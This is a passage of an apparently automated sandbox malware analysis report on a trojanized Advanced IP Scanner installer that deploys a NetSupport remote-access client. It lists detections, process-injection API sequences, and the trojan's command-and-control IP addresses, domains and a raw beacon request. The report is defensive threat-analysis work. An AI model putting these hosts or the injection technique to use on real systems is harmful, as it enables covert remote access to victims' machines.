Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-3ARML.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: is-NMSBJ.tmp.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: is-51B0J.tmp.1.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: is-JV2VP.tmp.1.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3640885931.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2161541920.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2250457017.0000000068895000.00000002.00000001.01000000.0000000D.sdmp

Spreading

Yara detected Advanced IP Scanner Hacktool

Source: Yara match

File source: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp, type: DROPPED

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	7_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	7_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11064E30
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49739 -> 151.236.16.15:443
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49740 -> 199.188.200.195:443

Yara detected NetSupport Downloader

Source: Yara match	File source: amsi32_7132.amsi.csv, type: OTHER
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.26.1.231 104.26.1.231

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49758

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: payiki.com
Source: global traffic	DNS traffic detected: DNS query: anyhowdo.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2176938305.0000000007540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microx
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000007.00000003.2067260818.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp$k
Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2
Source: client32.exe, 00000007.00000002.3638542031.000000000049A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp5X
Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspj
Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://s.symcd.com06
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://s.symcd.com0_
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcd.com0&
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://sw.symcd.com0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.dr	String found in binary or memory: http://www.advanced-ip-scanner.com0
Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.macrovision.com0
Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.radmin.com
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com/support
Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com/update
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DEC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ultimatenetworktool.com1
